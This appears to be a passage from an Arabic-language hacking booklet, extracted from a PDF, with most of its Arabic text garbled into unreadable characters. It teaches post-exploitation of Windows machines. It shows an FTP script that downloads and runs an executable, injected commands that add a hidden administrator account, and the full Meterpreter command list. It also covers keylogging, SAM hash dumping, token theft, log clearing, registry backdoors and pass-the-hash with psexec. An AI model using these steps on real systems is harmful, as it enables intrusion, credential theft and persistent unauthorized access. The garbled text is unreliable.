,,‫االْ ظٕب ععجٕب اٌٍّف‬

echo bye >>silv3r00t.txt


ftp ِٓ ‫ز‬ٚ‫٘زا خش‬

ftp -s:silv3r00t.txt

‫ً اٌٍّف‬١ّ‫جع‬

silv3r00t.exe

..‫ٔؾغً اٌٍّف‬

‫صس‬ٛ٠ ٗ‫ امبف‬ٟ٘ ٗ‫مٗ اٌربٌر‬٠‫اٌطش‬3-

. ٗ‫ ٔفظ اٌؾجى‬ٍٝ‫ْ ػ‬ٛ‫ى‬٠ ُ‫بش‬ٌّٙ‫ب اْ ا‬ٙ‫مٗ ٌىٓ ِؾىٍح‬٠‫ً هش‬ٙ‫صس اع‬ٛ٠ ٗ‫امبف‬

ً‫ ٘زا اٌؾى‬ٍٝ‫ ػ‬ٟ٘ٚ

net user userna me password /add


net localgroup Administrateurs userna me /add

‫ِربي‬
arg1="c:\WINDOWS\system32\cmd.exe /c net user silv3r00t 123 /add && net local
group Administrateurs silv3r00t /add "

29
.‫ماذا بعد االختراق‬

Meterpreter َ‫فنً اعحخذا‬٠ ‫ثؼذ االخحشاق‬


ٗ‫ج‬ٛ‫ٌزٌه ٌم‬
Meterpreter

‫س‬ٛ‫حق‬٠ ‫ ثؾىً ال‬ٞٛ‫ل‬ٚ ‫ت شذآ‬١‫ػص‬Payload ٓ‫ ػجبسٖ ػ‬ٛ٘ٚMetasploit-interpreter ٗ‫مقذ ث‬٠

.‫ث‬٠ٍٛ‫حبعج‬١ٌّ‫ك ا‬٠‫لغ أٗ أغعت االْ ِٓ فش‬ٛ‫اج‬ٚ skape ٝ‫ذػ‬٠ ‫ لبَ ثجشِصحٗ ؽخـ‬, ٖ‫ اٌزاوش‬ٟٕ‫ار ٌُ جخ‬

)‫ جُ اخحشالٗ (ثؼل اٌّشات ال‬ٞ‫عظ اٌز‬ٚ‫ اٌجش‬ٟ‫حُ ظمٕٗ ف‬٠DLL ‫ ػجبسٖ ػٓ ٍِفبت‬ٛ٘

‫عظ‬ٚ‫ٕعمٓ ثٕفظ اٌجش‬٠ ‫حش ساض‬٠‫شثش‬١‫اٌّح‬563 , ْٛ‫ى‬٠ ‫عظ ساض‬ٚ‫اٌجش‬ٚFTP ِٗ‫ اخش ؽغٍٕب خذ‬ٕٝ‫ثّؼ‬

ً١‫ ِٓ ٘زا اٌمج‬ٚ‫ا‬crash ‫ٌزٌه أحجٗ ارا فبس‬

) ٗ٠ٛ‫ضٖ ل‬١ِ ( ! ‫بسدعه اال ارا اِشجٗ أث‬ٌٙ‫ّظ ا‬٠ ‫ال‬ٚ ٖ‫ اٌزاوش‬ٍٝ‫ؽغٍٗ ػ‬

be in touch with the meterpreter ‫جٗ وً ِشٖ ٌزٌه‬ٛ‫ ل‬ٟ‫ذ ف‬٠‫ض‬٠ٚ ‫ش‬٠ٛ‫ٗ جط‬١‫ش ف‬١‫ق‬٠ ‫ع‬ٛ‫وً اعج‬

!‫ ٌه‬ٟ‫ٔحشن اٌحصشثٗ ٌٍجبل‬ٚ ‫ب‬ِٕٙ ‫غ ٌجؼل‬٠‫ اٌغش‬ٍٝ‫ب ٌىٓ ساض اؽشض ػ‬ٙ‫ؼ‬١ّ‫ب ش‬ٙ‫ثّىؤٔه جصشثح‬ٚ , ٖ‫ذ‬٠‫اِشٖ ػذ‬ٚ‫ا‬

meterpreter > help

Core Commands
=============

Command Description
------- -----------
? Help menu
background Backgrounds the current session
channel Displays information about active channels
close Closes a channel
exit Terminate the meterpreter session
help Help menu
interact Interacts with a channel
irb Drop into irb scripting mode
migrate Migrate the server to another process
quit Terminate the meterpreter session
read Reads data from a channel
run Executes a meterpreter script
use Load a one or more meterpreter extensions
write Writes data to a channel

30
Stdapi: File system Commands
============================

Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
del Delete the specified file
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lpwd Print local working directory
ls List files
mkdir Make directory
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
upload Upload a file or directory

Stdapi: Networking Commands


===========================

Command Description
------- -----------
ipconfig Display interfaces
portfwd Forward a local port to a remote service
route View and modify the routing table

Stdapi: System Commands


=======================

Command Description
------- -----------
clearev Clear the event log
drop_token Relinquishes any active impersonation token.
execute Execute a command
getpid Get the current process identifier
getprivs Get as many privileges as possible
getuid Get the user that the server is running as
kill Terminate a process
ps List running processes
reboot Reboots the remote computer
reg Modify and interact with the remote registry
rev2self Calls RevertToSelf() on the remote machine
shell Drop into a system command shell
shutdown Shuts down the remote computer
steal_token Attempts to steal an impersonation token from the target pr
ocess
sysinfo Gets information about the remote system, such as OS

Stdapi: User interface Commands

31
===============================

Command Description
------- -----------
enumdesktops List all accessible desktops and window stations
idletime Returns the number of seconds the remote user has been idl
e
keyscan_dump Dump they keystroke buffer
keyscan_start Start capturing keystrokes
keyscan_stop Stop capturing keystrokes
setdesktop Move to a different workstation and desktop
uictl Control some of the user interface components

Priv: Elevate Commands


======================

Command Description
------- -----------
getsystem Attempt to elevate your privilege to that of local system.

Priv: Password database Commands


================================

Command Description
------- -----------
hashdump Dumps the contents of the SAM database

Priv: Timestomp Commands


========================

Command Description
------- -----------
timestomp Manipulate file MACE attributes

meterpreter >

, ٌّّٗٙ‫ٔؤخز ا‬

sysinfo

XP or vistaِٗ‫حٕب الصَ ٔؼشف ٔظب‬١‫ الْ لجً ِب ٔؾحغً ثنع‬, ‫ّٗ شذا‬ِٙ ٞ‫٘ز‬ٚ , َ‫ِبت إٌظب‬ٍٛ‫خشز ٌٕب ِؼ‬٠

! ً‫ش اٌؾ‬١‫ط‬٠ ‫ساض‬ٚ XP , ٞ‫ػبد‬ٚ vista َ‫ت ثبٌٕغجٗ ٌٕظب‬٠‫ء ِش‬ٟ‫ُ جخحٍف ِّىٓ جؼًّ ؽ‬ٙ‫ح‬٠‫الْ ظّب‬

shutdown /reboot

,, ٍٗ١‫ اػبدٖ جؾغ‬ٚ‫بص ا‬ٙ‫اهفبء اٌص‬

32
‫اثحؼذ ػٓ ٘ز‪ ٞ‬ثمذس اٌّغحطبع ‪ ,‬الْ ِؼ ِٓ فبٌعٕب ٔغٍك اٌص‪ٙ‬بص ا‪ٔ ٚ‬ؼ‪١‬ذٖ !‬

‫‪reg‬‬

‫اٌحؼذ‪ ً٠‬ػٍ‪ ٝ‬اٌش‪٠‬صغحش‪ ٞ‬ا‪ ٚ‬لشاجٗ ‪ِ ,‬ف‪١‬ذٖ شذا ع‪ٛ‬اء جشو‪١‬ت ‪١ٌ backdoor‬حُ ػٍّٗ وً ثؤٔحظبَ !‬

‫‪cd‬‬

‫اٌحٕمً ث‪ ٓ١‬اٌّصٍذات‬

‫‪lcd‬‬

‫‪local cd ,‬اٌحٕمً ف‪ ٟ‬اٌّصٍذات ٌىٓ ف‪ ٟ‬ش‪ٙ‬بص اٌّ‪ٙ‬بشُ‬

‫‪getwd / pwd‬‬

‫هجبػٗ اٌّصٍذ اٌٍ‪ ٟ‬ؽغبٌ‪ ٓ١‬ػٍ‪ٗ١‬‬

‫‪ls‬‬

‫اعحؼشاك اٌٍّفبت‬

‫‪cat‬‬

‫لشاءٖ ٍِف ِؼ‪ٓ١‬‬

‫‪download / upload‬‬

‫سفغ اٌٍّفبت ا‪ ٚ‬جٕض‪ٍٙ٠‬ب ‪٘ٚ‬ز‪ ِّٗٙ ٞ‬ع‪ٛ‬اء ٌشفغ ِرال ‪ backdoors‬ا‪ٌ ٚ‬حٕض‪ٍِ ً٠‬فبت ِ‪ٌ ّٗٙ‬ذ‪ ٜ‬اٌنع‪! ٗ١‬‬

‫‪mkdir /rmdir‬‬

‫ظزف ِصٍذ ا‪ ٚ‬ػًّ ِصٍذ شذ‪٠‬ذ !‬

‫‪edit‬‬

‫اٌحؼذ‪ ً٠‬ػٍ‪ٍِ ٝ‬ف ‪٠ٚ‬ؾجٗ ‪ vi‬ف‪ ٟ‬اٌٍ‪ٔٛ١‬ىظ‬

‫‪getpid‬اٌعق‪ٛ‬ي ػٍ‪ ٝ‬اٌجش‪ٚ‬عظ سلُ اٌٍ‪ ٟ‬ؽغبٌ‪ ٓ١‬ػٍ‪ٗ١‬‬

‫‪33‬‬
‫‪getuid‬‬

‫ظق‪ٛ‬ي اٌ‪ٛ١‬صس اٌٍ‪ ٟ‬ؽغبٌ‪ ٓ١‬ػٍ‪ٗ١‬‬

‫‪execute‬‬

‫جؾغ‪ ً١‬ثشٔبِس ِرال !‬

‫‪kill‬‬

‫لحً ثش‪ٚ‬عظ‬

‫‪ps‬‬

‫اعحؼشاك اٌجش‪ٚ‬عظ‬

‫‪shell‬‬

‫اٌذخ‪ٛ‬ي ػٍ‪ ٝ‬عطش ا‪ٚ‬اِش اٌنع‪ٗ١‬‬

‫‪migrate‬اٌعمٓ ف‪ ٟ‬ثش‪ٚ‬عظ ‪ ,‬خط‪١‬شٖ ‪ٚ‬ل‪ِ ٗ٠ٛ‬ف‪١‬ذٖ ٌٍحخف‪ ٟ‬ثؼذ‬

‫‪ipconfig‬‬

‫ِرً اِش اٌ‪ٔٛ‬ذ‪ٚ‬ص‬

‫‪portfwd‬‬

‫ل‪ ٗ٠ٛ‬ا‪٠‬نب ‪ ,‬جؼًّ ‪ٌٍ forward‬جبوث ِٓ ش‪ٙ‬بص اٌنع‪ ٗ١‬اال ش‪ٙ‬بص اخش (ِٓ ث‪ٛ‬ست وزا اٌ‪ ٝ‬ث‪ٛ‬ست وزا ػٍ‪ ٝ‬اٌص‪ٙ‬بص االخش)‬

‫‪route‬‬

‫اظ‪ٙ‬بس ‪ٚ‬جؼذ‪ ً٠‬شذا‪ٚ‬ي اٌشا‪ٚ‬ت‪.‬‬

‫‪use‬‬

‫جٕض‪ِٛ ً٠‬دٌض ‪ٚ ,‬هجؼب وً ِ‪ٛ‬دي ٌٗ ل‪ٛ‬جٗ ‪:D‬‬

‫‪run‬‬

‫‪34‬‬
‫جؾغ‪ ً١‬عىشثحبت اٌّح‪١‬شثش‪٠‬حش ‪ ,‬اٌغىشثحبت ل‪ ٗ٠ٛ‬شذا‬

‫‪idltime‬‬

‫االِش ٘زا ثجغبهٗ ‪٠ ,‬ؾ‪ٛ‬ف اٌنع‪ِ ِٓ ٗ١‬حى‪ِ ٝ‬ب ٌّظ اٌى‪١‬ج‪ٛ‬سد ‪ٚ‬اٌّب‪ٚ‬ط‬

‫اٌجؼل ‪٠‬م‪ٛ‬ي ِبٌٗ فب‪٠‬ذٖ ‪ ,‬أب ال‪ٌٛ‬ه ‪ ٌٛ ,‬اْ اٌنع‪ ٌٗ ٗ١‬عبػح‪ِ ٓ١‬ب ٌّظ اٌى‪١‬ج‪ٛ‬سد ‪ٚ‬اٌّب‪ٚ‬ط !‬

‫‪٠‬ؼٕ‪ ٟ‬ار اٌنع‪ ٗ١‬غ‪١‬ش ِ‪ٛ‬ش‪ٛ‬د !‬

‫ٔغحؼًّ ‪vnc ,‬‬

‫‪uictl‬‬

‫جؼط‪ ً١‬اٌّب‪ٚ‬ط ا‪ ٚ‬اٌى‪١‬ج‪ٛ‬سد ‪,‬‬

‫‪hashdump‬‬

‫اداٖ خ‪١‬بٌٗ فشاظٗ ‪,‬فبئذجٗ اظ‪ٙ‬بس اٌ‪ٙ‬بؽبت اٌّ‪ٛ‬ش‪ٛ‬د ف‪ ٟ‬لبػذٖ ث‪ٕ١‬بت ‪SAM‬‬

‫‪35‬‬
‫ف‪ٛ‬ائذٖ ال جعق‪ ,, ٝ‬ا‪ٚ‬ال اعحخشاز ثبع‪ٛ‬سد االدِٓ ‪ ,‬اعحخذاَ ‪windows/smb/psexec‬‬

‫ا‪ ٚ‬ثّب ‪٠‬ؼشف ‪pass the hash attack ,‬جشو‪١‬ت خذِٗ جٍٕث ثذ‪ ْٚ‬ػًّ ‪ٛ٠‬صس شذ‪٠‬ذ !‬

‫جؼبٌ‪ٔ ٛ‬فه اٌ‪ٙ‬بػ‬

‫‪36‬‬
‫ِرً ِب جؾ‪ٛ‬ف‪ , ْٛ‬ػشفٕب اٌجبع‪ٛ‬سد‬

‫فً الختام اتمنى ان ىذا الكتٍب افاد البعض ولو بشًء الٍسٍز‪ ,‬وال ارٌذ مه وراء ىذا الكتٍب اال الذعوه بالمغفزه والزحمو لً‬
‫ولوالذي ‪.‬‬

‫‪P0C T34M‬‬
‫‪My sites: arab4services.net and p0c.cc‬‬

‫‪37‬‬

You might also like